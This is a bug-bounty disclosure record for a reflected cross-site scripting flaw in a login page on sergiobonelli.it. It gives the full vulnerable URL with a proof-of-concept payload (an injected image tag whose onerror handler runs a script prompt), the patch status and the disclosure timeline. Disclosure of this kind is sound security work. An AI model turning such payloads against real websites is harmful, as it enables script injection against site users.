sergiobonelli.it XSS vulnerability

2016-05-09T17:27:00
ID OBB:150858
Type openbugbounty
Reporter Oc3f
Modified 2017-11-24T10:58:00

Description

Vulnerable URL:
http://www.sergiobonelli.it/widget/head/login.jsp?password_dimenticata_testo=%22%3E%22%3E%3Cimg%20src=x%20onerror=prompt%28/OPENBUGBOUNTY/%29%3E&x;=0&y;=0&idcanale;=9&elementsOrder;_logged=username%2Cmodifica_dati%2Clogout&tipo;_layout=header&classname;=head_login+head_login_casa_editrice&elementsOrder;_user_login=username%2Cpassword%2Csubmit%2Cuser_login%2Clogin_google%2Clogin_facebook&registrati;_testo=register&recupera;_password_invia_testo=proceed&elementsOrder;=apri_login%2Cregistrati%2Cuser_login&occhiello;_recupera_password=Insert+your+registration+e-mail+to+receive+a+link+to+change+your+password&q;=who+is+tex&message;_error=Error+logging%3A+username+or+password+incorrect%2C+or+the+account+has+not+been+activated.&title;_error=User+not+found&torna;_login_testo=back+to+login&ajax;=true&id;_canale_ajax=9
Details:

Description| Value
---|---
Patched:| Yes, at 24.11.2017
Latest check for patch:| 24.11.2017 10:58 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 132544
VIP website status:| No
Check sergiobonelli.it SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 9 May, 2016 17:27 GMT
Generic security notifications sent to website owner| 9 May, 2016 17:30 GMT
Vulnerability details disclosed by researcher| 1 August, 2016 18:12 GMT
Vulnerability patched by the website owner| 24 November, 2017 10:58 GMT